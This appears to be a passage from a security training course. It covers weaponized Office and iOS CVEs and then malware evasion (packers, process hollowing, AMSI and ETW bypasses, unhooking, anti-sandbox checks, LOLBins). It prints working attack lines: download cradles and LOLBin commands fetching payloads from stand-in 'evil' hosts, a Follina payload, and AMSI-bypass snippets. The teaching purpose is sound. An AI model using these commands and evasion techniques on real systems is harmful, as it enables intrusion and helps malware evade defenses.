Modern exploit chains typically combine an info leak (defeats ASLR by revealing a DLL base address) + a ROP chain (defeats DEP by reusing existing code) + a sandbox escape (breaks out of application isolation). Each layer adds cost and complexity — this is why a working zero-click iOS chain costs $2.8M+.

// 08 — Real-World CVEs ⏱ 6 min · Intermediate

Notable Exploit CVEs

These are publicly documented vulnerabilities that have been weaponized in real-world attacks against governments, corporations, and individuals. Every single one has been patched — studying them reveals the patterns attackers reuse, the code paths they target, and the detection opportunities defenders can exploit. Each CVE below includes: what the vulnerability was, how attackers exploited it, the technical mechanism, and what defenders should look for.

CVE	Name	Type	CVSS	Severity	Year
CVE-2017-0199	HTA Handler	Doc / OLE	9.8	CRITICAL	2017
CVE-2017-11882	Equation Editor	Doc / Memory Corruption	7.8	CRITICAL	2017
CVE-2019-3568	WhatsApp VoIP	Zero-Click / Buffer Overflow	9.8	CRITICAL	2019
CVE-2021-1732	Win32k Priv Esc	Kernel / LPE	7.8	HIGH	2021
CVE-2021-30860	FORCEDENTRY	Zero-Click / Image Parser	7.8	CRITICAL	2021
CVE-2021-40444	MSHTML RCE	Doc / ActiveX	7.8	CRITICAL	2021
CVE-2022-30190	Follina	Doc / MSDT Protocol	7.8	CRITICAL	2022
CVE-2023-36884	Office HTML RCE	Doc / HTML Smuggling	7.5	CRITICAL	2023
CVE-2023-41064	BLASTPASS	Zero-Click / Image	7.8	CRITICAL	2023

Detailed CVE Breakdowns

Each CVE below is broken down into its full technical detail — the vulnerability, how it was exploited in the wild, what the attacker's exploit looked like, and what defenders should monitor for.

CVE-2017-0199 — HTA Handler (Microsoft Office)

The Vulnerability: When a Word document contained an OLE2 embedded object linking to an external URL, Word would fetch that URL and — if the server returned content with a Content-Type: application/hta header — Word would pass the content directly to mshta.exe (the HTML Application host) for execution. This happened before any security prompt was shown to the user.

How Attackers Exploited It: The attacker crafted a .docx file with an embedded OLE object whose relationship target pointed to http://attacker.com/payload.hta. The document.xml.rels file contained: Target="http://evil.com/payload.hta" TargetMode="External". When the victim opened the document, Word fetched the URL silently. The attacker's server returned an HTA file containing VBScript that ran Shell("powershell -enc [base64_payload]"). This executed arbitrary PowerShell commands with the user's privileges.

Detection: Monitor for mshta.exe spawned as a child process of WINWORD.EXE. Look for outbound HTTP requests from Office processes. YARA rule: match on OLE2Link + external URL in relationship files.

CVE-2017-11882 — Equation Editor Buffer Overflow

The Vulnerability: Microsoft's Equation Editor (EQNEDT32.EXE) was a 17-year-old component compiled in November 2000 without ASLR, DEP, or stack canaries. It processed OLE Equation objects embedded in Office documents. A font name field in the MTEF (MathType Equation Format) data had a fixed 48-byte buffer with no bounds checking. Writing more than 48 bytes into this field overflowed the stack and overwrote the return address.

How Attackers Exploited It: The exploit embedded a crafted Equation object inside a .docx file. The font name field was filled with 44 bytes of padding + the address 0x00402114 (a fixed address inside EQNEDT32.EXE pointing to a WinExec() gadget, reliable because no ASLR). After the return address, the attacker placed a command string like cmd /c powershell -nop -w hidden -enc [base64]. When Equation Editor processed the font name, it overflowed → returned into WinExec → executed the command. The entire exploit payload was 92 bytes.

Why It Was So Dangerous: No ASLR meant the return address never changed. No DEP meant stack data could be executed. No canaries meant the overflow was never detected. The exploit worked reliably across every Windows version and every Office version that shipped EQNEDT32.EXE — for 17 years of installs.

Detection: Monitor for EQNEDT32.EXE spawning child processes (it should never do this). YARA rule: match on Equation OLE CLSID {0002CE02-0000-0000-C000-000000000046} with font name length > 48 bytes.

CVE-2019-3568 — WhatsApp VoIP Buffer Overflow

The Vulnerability: WhatsApp's VoIP (Voice over IP) implementation used the SRTP (Secure Real-time Transport Protocol) stack to process incoming call setup packets. A buffer overflow existed in the SRTCP (SRTP Control Protocol) handler that parsed incoming packet data. The parser read a length field from the packet and used it to copy data into a fixed-size buffer — without validating that the length was within bounds.

How Attackers Exploited It: The NSO Group's Pegasus spyware used this vulnerability. The attack was completely zero-click: the attacker sent a specially crafted SRTCP packet by initiating a call to the victim's phone number. The victim's phone didn't even need to answer — WhatsApp processed the call setup packet automatically. The overflow in the SRTCP handler hijacked control flow and loaded the Pegasus payload, which gained full access to the device (messages, camera, microphone, GPS, passwords). The call log entry was then deleted so the victim saw nothing.

Detection: Correlate incoming WhatsApp calls with no call log entry. Monitor for unexpected process memory modifications after WhatsApp network activity. WhatsApp published hashes of the exploit packets for forensic analysis.

CVE-2021-1732 — Win32k Privilege Escalation

The Vulnerability: A type confusion bug in the Windows kernel's win32kfull!xxxClientAllocWindowClassExtraBytes function. When a window was created with extra bytes (cbWndExtra), the kernel allocated memory and returned a pointer. An attacker could manipulate the window creation process to cause the kernel to use a user-mode callback that returned a different allocation — creating a type confusion where the kernel treated user-controlled data as a kernel object pointer.

How Attackers Exploited It: This was a privilege escalation exploit — used after initial access (e.g., via a document exploit) to go from user-level to SYSTEM. The attacker created a window with specific cbWndExtra value, hooked the user-mode callback xxxClientAllocWindowClassExtraBytes, returned a crafted buffer from the callback, and the kernel wrote a kernel pointer into attacker-controlled memory. This gave arbitrary kernel read/write, used to steal the SYSTEM process token and assign it to the attacker's process.

The Chain: Often seen as Stage 2 in attack chains — a document exploit gains initial code execution (Stage 1), then CVE-2021-1732 escalates to SYSTEM (Stage 2), then the attacker dumps credentials with Mimikatz (Stage 3).

Detection: Monitor for user-mode processes making unusual NtUserConsoleControl syscalls. Kernel exploit artifacts include processes with SYSTEM token that were launched from browser or Office contexts.

CVE-2021-30860 — FORCEDENTRY (NSO Pegasus)

The Vulnerability: A integer overflow in Apple's CoreGraphics framework, specifically in the JBIG2 image decoder used to render PDF content in iMessage. JBIG2 is a lossless compression standard for bi-level (black and white) images. Apple's implementation had a flaw where a crafted JBIG2 stream with specific segment parameters could cause an integer overflow in a size calculation, leading to a heap buffer overflow.

How Attackers Exploited It: NSO Group sent an iMessage to the target containing a PDF file disguised as a .gif (iMessage rendered it automatically, zero-click). The PDF contained a JBIG2 stream with over 70,000 segment commands that, taken together, defined a virtual computer architecture. The JBIG2 segments were used as logical operations (AND, OR, XOR, NOT) on memory regions, implementing a full virtual machine with registers, an ALU, and conditional branching — all within the JBIG2 decompression engine. This VM then bootstrapped a more capable exploit that escaped the iMessage sandbox to install Pegasus.

Why This Was Unprecedented: Google Project Zero called it "one of the most technically sophisticated exploits we've ever seen." The attacker built a Turing-complete computer inside an image decoder — no JavaScript, no JIT, no scripting engine. Pure data manipulation through a compression standard's legitimate operations.

Detection: Look for PDF files received via iMessage with unusually large JBIG2 streams (>10KB is suspicious). Apple added BlastDoor sandbox in iOS 14 to isolate iMessage parsing, but FORCEDENTRY bypassed it. iOS 15 hardened JBIG2 parsing significantly.

CVE-2021-40444 — MSHTML ActiveX RCE

The Vulnerability: Microsoft's MSHTML (Trident) engine — the same engine behind Internet Explorer — could be invoked by Office documents to render HTML content. A flaw allowed a specially crafted ActiveX control to be downloaded and instantiated through MSHTML when processing Office documents with embedded HTML content. The ActiveX control could execute arbitrary code because Office did not properly restrict which controls could be loaded.

How Attackers Exploited It: The attacker sent a .docx file that contained a document.xml.rels relationship pointing to an external HTML page: http://attacker.com/exploit.html. When Word loaded this page through MSHTML, the HTML contained an <object> tag that downloaded a .CAB file from the attacker's server. Inside the CAB was a malicious .DLL renamed with a .INF extension. MSHTML extracted the CAB, loaded the DLL via a crafted directory traversal path in the CAB extraction, and the DLL began executing as a child of Word — downloading and running a Cobalt Strike beacon.

Detection: Monitor for WINWORD.EXE making HTTP requests to external servers. Look for .CAB file extraction in temporary directories. YARA rule: match on mhtml: protocol handler references in document.xml.rels.

CVE-2022-30190 — Follina (MSDT Protocol Attack)

The Vulnerability: The ms-msdt: protocol handler (Microsoft Support Diagnostic Tool) accepted command-line arguments via URL. When an Office document loaded an external HTML page that used the ms-msdt:/id PCWDiagnostic /skip force /param "IT_BrowseForFile=..." URL scheme, MSDT would launch and process the parameters. The IT_BrowseForFile parameter was expanded by sdiagnhost.exe using PowerShell's Invoke-Expression — meaning any value in this parameter became executable PowerShell code.

How Attackers Exploited It: The attack chain was: (1) .docx with external relationship → (2) Word fetches HTML from attacker server → (3) HTML contains: location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_BrowseForFile=$(IEX($(Invoke-RestMethod http://c2/payload.ps1))\"" → (4) MSDT launches → (5) sdiagnhost.exe runs PowerShell → (6) attacker has code execution. Critically, this worked even in Protected View for .RTF files — the preview pane in Windows Explorer triggered it without even opening the file.

Detection: Monitor for msdt.exe or sdiagnhost.exe spawned as children of Office processes. Delete the ms-msdt registry key to disable the protocol handler entirely: reg delete HKCR\ms-msdt /f.

CVE-2023-36884 — Office HTML RCE (Storm-0978)

The Vulnerability: A complex chain of vulnerabilities in how Microsoft Office processed HTML content through the MSHTML engine. Multiple security checks could be bypassed using special URL constructions and file path handling, allowing remote code execution when a user opened a specially crafted Office document — even with macros disabled.

How Attackers Exploited It: The Russian threat group Storm-0978 (RomCom) used this in targeted attacks against NATO summit attendees and Ukrainian government organizations. The attack used a crafted .docx file that triggered a chain of HTML loads, each bypassing a different security boundary. The document loaded external HTML through MSHTML, which loaded additional content via search-ms: protocol handler, eventually achieving code execution through a Mark-of-the-Web bypass combined with a SmartScreen bypass. The final payload was the RomCom backdoor — a full RAT (Remote Access Trojan) with keylogging, screen capture, and data exfiltration capabilities.

Detection: Monitor Office processes for chains of child process creation. Look for search-ms: protocol handler invocations from document contexts. Block outbound HTTP from Office processes with firewall rules. Microsoft released emergency mitigations before the patch was ready.

CVE-2023-41064 — BLASTPASS (NSO Pegasus, Again)

The Vulnerability: A buffer overflow in Apple's ImageIO framework, specifically in the WebP image decoder (libwebp). The vulnerability existed in the Huffman coding table construction used during WebP lossless decompression. A crafted WebP image with malformed Huffman codes caused a heap buffer overflow when the decoder attempted to build the lookup table.

How Attackers Exploited It: NSO Group combined this with a second vulnerability (CVE-2023-41061, a PassKit/Wallet validation bypass) in a two-step zero-click chain. Step 1: An iMessage was sent containing a PassKit attachment (.pkpass file — normally used for Apple Wallet passes). The PassKit attachment contained a crafted WebP image that triggered CVE-2023-41064 heap overflow during automatic thumbnail generation. Step 2: The heap overflow exploited the Wallet validation bypass (CVE-2023-41061) to escape the BlastDoor sandbox that Apple had specifically built to prevent FORCEDENTRY-style attacks. The combined chain installed Pegasus spyware with full device access.

Why It Matters: This showed that even after Apple built BlastDoor specifically to stop zero-click iMessage exploits, NSO Group found a way around it within 2 years — by chaining a different parser (WebP in ImageIO) with a different sandbox escape (PassKit instead of JBIG2). The WebP vulnerability (CVE-2023-41064) also affected Chrome, Firefox, and virtually every application that used libwebp — making it one of the most impactful image parser bugs in history.

Detection: Update to iOS 16.6.1+. Monitor for unusually large .pkpass files received via iMessage. Apple's Lockdown Mode blocks PassKit previews in iMessage, which would have prevented this chain.

🔍 Pattern Recognition for Defenders

Across all 9 CVEs above, notice the recurring patterns: (1) Parser vulnerabilities — every exploit targets code that parses complex data formats (OLE, JBIG2, WebP, SRTCP, PDF). (2) Privilege boundaries — attackers chain user-mode exploits with kernel exploits (CVE-2021-1732) or sandbox escapes (BLASTPASS). (3) Legacy components — EQNEDT32.EXE (17 years old), MSHTML/Trident (deprecated but still loadable), MSDT (rarely used diagnostic tool). (4) Protocol handlers — ms-msdt:, search-ms:, mhtml: — these URL schemes bridge security boundaries. Disabling unnecessary protocol handlers and removing legacy components dramatically reduces attack surface.

// 09 — FUD & Evasion ⏱ 20 min · Advanced

How Malware Goes Fully Undetected

You've seen how exploits work — the buffer overflows, the shellcode, the PDF weaponization. But here's the reality: none of that matters if antivirus catches it on delivery. This is where FUD — Fully Undetectable — comes in. Every serious attacker spends more time making their payload invisible than building the exploit itself. This section breaks down every layer of the evasion stack, the exact tools and techniques used, and how defenders catch each one.

⚠️ Educational Context Only

This section explains evasion techniques so defenders and security analysts understand what they're up against. Every technique described here is documented in public threat intelligence reports, academic papers, and vendor advisories. Understanding evasion is essential for writing detection rules, tuning EDR policies, and conducting threat hunting. The goal: if you know how they hide, you know where to look.

What Does "FUD" Actually Mean?

In underground markets, FUD = Fully Undetectable — meaning a payload that returns 0 detections across all antivirus engines when scanned. The term comes from a simple test: upload your malware to a multi-scanner, check the results.

0 / 72

FUD — Zero detections

Price: $300-$2,000/month

3 / 72

UD — Mostly undetected

Acceptable for targeted attacks

47 / 72

Burned — Widely detected

Useless — needs re-FUD

FUD lifespan: A fresh FUD payload typically lasts 24-72 hours before cloud-based AV (telemetry, behavioral ML, community submissions) picks it up. APT groups maintain dedicated teams that re-FUD payloads continuously. The underground economy charges $50-$150 per "re-crypt" to restore FUD status.

🔄 The Detection Pipeline — What Every Payload Must Survive

A file goes through 5 stages of analysis before it detonates on a target. Evasion means beating ALL of them:

① Static Signature: YARA-like byte pattern matching against known malware databases. Speed: microseconds. Bypass: change the bytes (encryption, packing, polymorphism).

② Heuristic Analysis: Rules that flag suspicious characteristics — high entropy, no imports, suspicious section names, packer signatures. Bypass: entropy reduction, import reconstruction, legitimate-looking PE structure.

③ Behavioral/Emulation: AV emulates the first ~1000 instructions in a mini sandbox to see what the code does. Bypass: environmental checks, delayed execution, anti-emulation tricks.

④ Cloud/ML Analysis: File hash and metadata sent to cloud for machine learning classification. Bypass: unique hash per target, metadata spoofing, signed executables.

⑤ Full Sandbox Detonation: File executed in an instrumented VM for 2-5 minutes. Monitors: API calls, network traffic, registry, file system. Bypass: VM detection, timing attacks, user interaction requirements.

Layer 1 — Packers & Crypters (Static Evasion)

The first and most fundamental evasion layer. The goal: make the file look like something it isn't so signature scanners can't pattern-match it.

📦 Packers — Compressing the Binary

What they do: Compress the entire executable into a compressed blob, then prepend a small "stub" that decompresses it into memory at runtime. The original code never exists on disk in readable form.

How it works:

Original EXE (100 KB)
├── .text  → executable code (detectable)
├── .data  → strings like "WinExec" (detectable)
└── .rsrc  → resources

After UPX packing (40 KB):
├── UPX0  → empty (will be filled at runtime)
├── UPX1  → compressed blob (looks like random data)
└── stub  → 2KB decompressor
    └── At runtime: decompress UPX1 → UPX0 → jump to OEP

Common packers:

UPX — Free, open source. Reduces size 50-70%. Easily detected and unpacked. Used by script kiddies and some commodity malware.
Themida/WinLicense — Commercial protector ($200-$1500). VM-based code virtualization, anti-debug, anti-dump. Used by banking trojans (Dridex, TrickBot).
VMProtect — Commercial ($200-$700). Converts x86 to proprietary bytecode executed by built-in VM. Extremely hard to reverse. Used by APT groups and game cheats alike.
ASPack / PECompact — Lightweight commercial packers. Low overhead, quick to deploy. Common in older malware families.

Detection: YARA rules for packer stubs (UPX! magic bytes), section name patterns (UPX0/UPX1), abnormal section entropy (>7.0), tiny import table (only LoadLibrary + GetProcAddress).

🔐 Crypters — Encrypting the Payload

What they do: Encrypt the malware payload with AES/RC4/XOR, bundle it with a "stub" (decryptor) that decrypts and executes it in memory. The encrypted payload has zero recognizable signatures.

Architecture:

Crypter Output:
┌─────────────────────────────┐
│  STUB (clean decryptor)     │ ← Looks legitimate
│  ├── AES key (embedded)     │
│  ├── Decrypt routine        │
│  └── Execution method:      │
│      ├── RunPE (hollowing)  │
│      ├── Reflective inject  │
│      └── Shellcode execute  │
├─────────────────────────────┤
│  ENCRYPTED PAYLOAD          │ ← AES-256 encrypted
│  (rat.exe, stealer.exe)     │    No signatures visible
│  Entropy: ~7.99/8.00        │
└─────────────────────────────┘

Stub types:

Scantime FUD — Defeats static scanning only. Payload decrypts on disk then runs normally. Cheaper ($20-50). Caught by behavioral.
Runtime FUD — Decrypts in memory only, never touches disk in plaintext. Uses process injection to run inside a legitimate process. Defeats static + behavioral ($100-500).
Native stub — Written in C/C++, no .NET dependency. Smaller, faster, harder to decompile than managed code stubs.
.NET stub — Uses Assembly.Load() for in-memory .NET payload execution. Easy to build, but .NET metadata gives defenders more to analyze.

Detection: High entropy sections, small import table, suspicious API sequences (VirtualAlloc → memcpy → VirtualProtect(PAGE_EXECUTE) → CreateThread), decryption loop patterns in code.

💰 The FUD Economy

Underground forums and Telegram channels sell FUD services as subscriptions. Typical pricing:

Crypter subscription: $30-150/month — includes daily stub updates to maintain FUD status

Single crypt: $15-50 — one-time encryption, FUD lasts 1-3 days

Private/custom crypter: $500-5,000 — hand-coded, unique stub, shared with <5 customers

FUD checking services: Private scanners (like antiscan.me) that test against 30+ AV engines without submitting samples to vendors (unlike VirusTotal which shares with all vendors)

Layer 2 — Polymorphic & Metamorphic Engines

Packers and crypters change how the payload looks on disk. Polymorphic and metamorphic engines go further — they change the code itself while preserving functionality.

🔀 Polymorphic Code — Same Logic, Different Bytes

Each time the malware copies itself or is generated, the decryption routine changes while the encrypted payload stays the same. The decryptor uses different registers, different instruction orders, and inserts junk code — so no two copies share the same byte signature.

// Generation 1:
MOV ECX, 0x1A4          ; payload length
MOV ESI, offset payload  ; source
XOR BYTE [ESI], 0x5A    ; XOR key
INC ESI
LOOP decrypt

// Generation 2 (same logic, different bytes):
MOV EDX, 0x1A4          ; different register
LEA EDI, [payload]      ; different addressing
SUB EDI, 1
next: INC EDI
      XOR BYTE [EDI], 0x5A
      DEC EDX
      JNZ next           ; different loop construct

Detection: Emulation — let the AV run the decryptor, then scan the decrypted payload. Cloud ML on behavioral patterns rather than bytes.

🧬 Metamorphic Code — Complete Self-Rewriting

The entire malware rewrites itself — not just the decryptor but the actual functional code. Techniques include: NOP insertion, register reassignment, instruction reordering, equivalent instruction substitution, code transposition, and junk code insertion.

Substitution examples:
XOR EAX, EAX       ↔  SUB EAX, EAX      ↔  MOV EAX, 0
ADD EAX, 5         ↔  SUB EAX, -5        ↔  LEA EAX, [EAX+5]
CMP EAX, 0; JE     ↔  TEST EAX, EAX; JZ  ↔  OR EAX, EAX; JZ
PUSH EAX; POP EBX  ↔  MOV EBX, EAX
NOP                ↔  XCHG EAX, EAX      ↔  LEA EAX, [EAX]

Code transposition:
Original: [Block A] → [Block B] → [Block C]
Rewritten: [Block C] → JMP B_addr
           [Block A] → JMP C_addr
           [Block B] → JMP end

Detection: Control flow graph analysis, behavioral signatures, code normalization (reduce equivalent instructions to canonical form before matching).

Layer 3 — Process Injection & In-Memory Execution

The most effective evasion: never write the real payload to disk at all. Instead, inject it directly into the memory of a legitimate process. To the OS and security tools, it looks like svchost.exe or explorer.exe is running — but the attacker's code lives inside it.

🧪 Process Hollowing (RunPE)

The most common technique used by crypters. Creates a legitimate process in a suspended state, hollows out its memory, writes the malicious PE, then resumes execution.

Step-by-step:
1. CreateProcess("svchost.exe", CREATE_SUSPENDED)
   → Real svchost starts but frozen before first instruction

2. NtUnmapViewOfSection(hProcess, imageBase)
   → Guts removed — original svchost code unmapped

3. VirtualAllocEx(hProcess, imageBase, malwareSize, MEM_COMMIT)
   → Fresh memory allocated at same address

4. WriteProcessMemory(hProcess, imageBase, malwarePE)
   → Malware PE written into svchost's memory space

5. SetThreadContext(hThread, newEntryPoint)
   → EIP/RIP pointed to malware's entry point

6. ResumeThread(hThread)
   → "svchost.exe" is now running your malware
   → Task Manager shows: svchost.exe (legitimate name+path)
   → Parent process: services.exe (looks normal)

MITRE: T1055.012 Process Hollowing

💉 Other Injection Techniques

Classic DLL Injection — CreateRemoteThread(LoadLibrary, "malware.dll"). Drops DLL to disk, injects into target process. Oldest method, well-detected. T1055.001
Reflective DLL Injection — DLL loaded entirely from memory using a custom loader. Never touches disk. Uses a reflective loader function inside the DLL itself that manually maps sections, resolves imports, calls DllMain. Used by Cobalt Strike, Metasploit. T1620
APC Injection — QueueUserAPC(shellcode, hThread). Queues malicious code to run next time the target thread enters an alertable wait state. Stealthier than CreateRemoteThread. T1055.004
Thread Hijacking — Suspend a thread, modify its RIP/EIP to point to shellcode, resume. No new thread created = less suspicious. T1055.003
Module Stomping — Overwrite the .text section of a legitimate DLL (e.g., amsi.dll) already loaded in process memory. Code runs from a backed (legitimate) memory region — avoids "unbacked executable memory" detections.
Early Bird Injection — Queue APC before process initialization completes. Runs before EDR hooks are in place. T1055.004

Detection: Monitor for cross-process memory operations: VirtualAllocEx + WriteProcessMemory + CreateRemoteThread from a process that shouldn't be doing this. EDR hooks these APIs at the ntdll level.

Layer 4 — Bypassing Security Products (EDR/AV/AMSI)

Even with encrypted payloads and process injection, modern EDR (Endpoint Detection and Response) instruments the OS at a deep level. Advanced attackers must specifically defeat these monitoring systems.

🛡️ AMSI — Antimalware Scan Interface (and How Attackers Kill It)

AMSI is Microsoft's content scanning pipeline. When PowerShell, .NET, JavaScript, VBScript, or Office VBA executes content, it passes through AMSI before running. AMSI sends the content (even if obfuscated) to the registered AV provider for scanning.

AMSI Pipeline:
PowerShell script → amsi.dll!AmsiScanBuffer() → AV Engine → ALLOW / BLOCK
                                    ↑
                        Attackers patch HERE

Bypass Method 1 — Memory Patching (most common):
1. GetProcAddress(amsi.dll, "AmsiScanBuffer")
2. VirtualProtect(addr, size, PAGE_EXECUTE_READWRITE)
3. Write: MOV EAX, 0x80070057; RET  (= E_INVALIDARG → "scan passed")
   → Every future AmsiScanBuffer() call returns "clean"

Bypass Method 2 — Forcing amsiInitFailed:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
  .GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
→ AMSI thinks initialization failed → all scans skipped

Bypass Method 3 — Unhooking amsi.dll:
Map fresh copy of amsi.dll from disk → overwrite .text section
→ All patches/hooks are removed → clean DLL, no scanning

Defense: Defender for Endpoint monitors AMSI integrity. .NET ETW events log AMSI bypass attempts. Behavioral rule: any process calling VirtualProtect on amsi.dll regions is suspicious.

🪝 EDR Userland Unhooking — Removing the Watcher

EDR products (CrowdStrike, SentinelOne, Defender for Endpoint) inject a DLL into every process that hooks critical API functions in ntdll.dll. When your malware calls NtWriteVirtualMemory, the call first goes through the EDR's hook, which logs it and decides whether to allow or block.

How EDR hooks work:
Normal:   NtWriteVirtualMemory → syscall → kernel
Hooked:   NtWriteVirtualMemory → JMP edr_monitor.dll → log → syscall → kernel

Unhooking Method 1 — Fresh ntdll mapping:
1. MapViewOfFile("C:\Windows\System32\ntdll.dll")  // read clean copy
2. Find .text section in both loaded and clean copies
3. VirtualProtect(loaded_ntdll.text, RWX)
4. memcpy(loaded_ntdll.text, clean_ntdll.text)     // overwrite hooks
→ All EDR hooks REMOVED — calls go directly to kernel

Unhooking Method 2 — Direct syscalls (Syswhispers / Hell's Gate):
Instead of calling ntdll!NtWriteVirtualMemory (which is hooked),
the malware contains its OWN syscall stubs:
  MOV R10, RCX
  MOV EAX, 0x3A        ; syscall number for NtWriteVirtualMemory
  SYSCALL               ; jump directly to kernel — EDR never sees it

Tools that implement this:
• SysWhispers — generates syscall stubs at compile time
• Hell's Gate — resolves syscall numbers dynamically at runtime
• Halo's Gate — handles partially-hooked ntdll scenarios
• RecycledGate / FreshyCalls — variant approaches

Defense: Kernel-level ETW (Event Tracing for Windows) still sees syscalls. Kernel callbacks (PsSetCreateProcessNotifyRoutine, ObRegisterCallbacks) operate at a level malware can't unhook from userland. Modern EDRs combine userland hooks + kernel telemetry for this reason.

📊 ETW Patching — Blinding the Telemetry

ETW (Event Tracing for Windows) is the OS-level logging framework. .NET events, PowerShell script blocks, process creation, network connections — all flow through ETW providers to security tools. Patching ETW makes the process invisible to monitoring.

ETW Patch (disable logging for current process):
1. GetProcAddress(ntdll.dll, "EtwEventWrite")
2. Write: RET (0xC3) at the entry point
   → EtwEventWrite immediately returns → no events logged
   → PowerShell ScriptBlock logging: GONE
   → .NET assembly load events: GONE
   → Process telemetry from this process: GONE

What disappears:
• Microsoft-Windows-PowerShell/Operational log entries
• .NET CLR loading events (Assembly.Load visible normally)
• WMI activity events
• Network connection attribution to this process

Defense: Monitor for ETW provider registration changes. Kernel-level drivers (minifilters) can detect ETW tampering. Integrity checks on ntdll.dll function prologues (detect single-byte patches).

Layer 5 — Anti-Sandbox & Anti-Analysis

Security sandboxes (AV emulators, corporate detonation chambers, VirusTotal) run suspicious files in monitored environments. Sophisticated malware fingerprints the environment and refuses to execute if it detects analysis.

🔍 Common Anti-Sandbox / Anti-VM Checks

── Environment Fingerprinting ──

// CPU check — sandboxes often have ≤2 cores
if (GetSystemInfo().dwNumberOfProcessors < 2) ExitProcess(0);

// RAM check — sandboxes often have ≤4GB
MEMORYSTATUSEX mem;
GlobalMemoryStatusEx(&mem);
if (mem.ullTotalPhys < 4ULL * 1024 * 1024 * 1024) ExitProcess(0);

// Uptime check — sandbox VMs are freshly booted
if (GetTickCount64() < 600000) Sleep(600000);  // wait 10 min

// Process count — real systems have 50+ processes
DWORD procs[1024]; EnumProcesses(procs, sizeof(procs), &needed);
if (needed/sizeof(DWORD) < 40) ExitProcess(0);

// Mouse movement — sandboxes don't move the mouse
POINT p1, p2;
GetCursorPos(&p1); Sleep(5000); GetCursorPos(&p2);
if (p1.x == p2.x && p1.y == p2.y) ExitProcess(0);

// Username/hostname check — avoid "sandbox", "virus", "malware"
char name[256]; DWORD sz = 256;
GetComputerNameA(name, &sz);
if (strstr(name, "sandbox") || strstr(name, "virus")) ExitProcess(0);

── Hypervisor / VM Detection ──

// CPUID hypervisor bit (bit 31 of ECX from leaf 1)
__cpuid(regs, 1);
if (regs[2] & (1 << 31)) ExitProcess(0);  // running in VM

// VMware I/O port backdoor
MOV EAX, 'VMXh'; MOV ECX, 0Ah; MOV EDX, 'VX'; IN EAX, DX
// If no exception → running in VMware

// Registry keys — VM guest tools leave traces
RegOpenKey(HKLM, "SOFTWARE\\VMware, Inc.\\VMware Tools", &key);
RegOpenKey(HKLM, "SOFTWARE\\Oracle\\VirtualBox Guest Additions", &key);

── Anti-Debug ──

// Direct API check
if (IsDebuggerPresent()) ExitProcess(0);

// PEB flag (manual check — bypasses API hooks)
BOOL dbg = *(PBYTE)(__readgsqword(0x60) + 2);  // PEB.BeingDebugged

// Timing-based — debug stepping is slow
LARGE_INTEGER t1, t2;
QueryPerformanceCounter(&t1);
// ... some code ...
QueryPerformanceCounter(&t2);
if ((t2.QuadPart - t1.QuadPart) > 10000) ExitProcess(0);

Layer 6 — Fileless Execution & Living Off the Land

The ultimate evasion: never drop a file at all. Use tools already on the victim's machine (LOLBins — Living Off the Land Binaries) and execute entirely from memory, scripts, or built-in OS features.

📂 Fileless Attack Chains

Example 1 — PowerShell Download Cradle (nothing written to disk):
powershell -nop -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://evil/payload.ps1')"
→ Script downloads into memory → executes → loads .NET assembly → injects into explorer.exe
→ Zero files on disk. Zero artifacts in Downloads. Only evidence: PowerShell logs (if enabled).

Example 2 — Macro → WMI Persistence (survives reboot without files):
Sub AutoOpen()
  Set objWMI = GetObject("winmgmts:\\.\root\subscription")
  ' Create WMI event subscription → runs PowerShell on every boot
  ' Payload stored in WMI repository (C:\Windows\System32\wbem\Repository)
  ' No visible file. No scheduled task. No registry run key.
End Sub

Example 3 — Registry-resident payload:
reg add HKCU\Software\Classes\Payload /v data /t REG_BINARY /d <shellcode_hex>
→ Shellcode stored in registry value
→ Loader reads registry → VirtualAlloc → memcpy → CreateThread
→ Payload lives in the registry hive, never as a file

🧰 LOLBins — Legitimate Tools Weaponized

These are signed Microsoft binaries already on every Windows machine. They have legitimate functions — but can be abused to download, decode, execute, or proxy malicious payloads. AV can't block them because they're part of Windows.

LOLBin	Legitimate Purpose	Abuse Technique	MITRE
certutil.exe	Certificate management	`certutil -urlcache -split -f http://evil/payload.exe` — downloads files	T1105
mshta.exe	HTML Application host	`mshta http://evil/payload.hta` — executes arbitrary VBScript/JScript	T1218.005
rundll32.exe	Execute DLL functions	`rundll32 javascript:"\..\mshtml,RunHTMLApplication";` + WSH script	T1218.011
regsvr32.exe	Register COM objects	`regsvr32 /s /n /u /i:http://evil/payload.sct scrobj.dll` — Squiblydoo attack	T1218.010
msbuild.exe	.NET Build tool	Build a .csproj with inline C# task → compile + execute arbitrary code	T1127.001
bitsadmin.exe	Background file transfer	`bitsadmin /transfer job /download http://evil/payload.exe`	T1197
wmic.exe	WMI management	`wmic process call create "powershell -enc <base64>"`	T1047
cmstp.exe	Connection Manager installer	Provide malicious .inf file → executes arbitrary commands, bypasses UAC	T1218.003

Detection: Sigma rules flagging unusual parent-child process chains (e.g., WINWORD.EXE → mshta.exe). Behavioral baselines — certutil making HTTP requests, msbuild executing outside of developer systems. LOLBAS project (lolbas-project.github.io) catalogs all known techniques.

Layer 7 — Advanced Stealth (Sleep, Signing, Entropy)

The final layers that separate amateur RATs from nation-state implants.

😴 Sleep Obfuscation (Ekko / Foliage)

C2 implants spend 99% of their time sleeping between check-ins. During sleep, the shellcode sits in readable memory — perfect for memory scanners. Sleep obfuscation encrypts the beacon's memory during sleep and decrypts only when it wakes up to check in.

Ekko Sleep Obfuscation:
1. Create timer queue (ROP chain using NtContinue)
2. Set timer callback: VirtualProtect(beacon, RW)
3. Set timer callback: SystemFunction032(beacon, key) // RC4 encrypt
4. Set timer callback: Sleep(60000)                    // 60s sleep
5. Set timer callback: SystemFunction032(beacon, key) // RC4 decrypt
6. Set timer callback: VirtualProtect(beacon, RX)
7. Queue all timers → beacon memory ENCRYPTED during sleep
→ Memory scan during sleep sees: encrypted garbage
→ Memory scan when awake: 0.5s window to catch it

Detection: Detect RWX → RW memory transitions. Scan for timer queue chains with suspicious callbacks. Thread stack analysis for NtContinue ROP gadgets.

📜 Code Signing Abuse

Windows SmartScreen and AV reputation engines trust signed binaries. Attackers exploit this trust through:

Stolen certificates — Purchasing or stealing code signing certs from compromised companies. Stuxnet used two stolen Realtek/JMicron certificates.
EV certificate purchase — $300-$500 through resellers with fake company documents. Extended Validation certs get instant SmartScreen trust.
Expired cert signing — Some signing tools allow timestamped signing with expired certs that still verify.
Signature side-loading — Embed malicious code in a signed binary's resource section or append it after the authenticode signature (signature still validates).

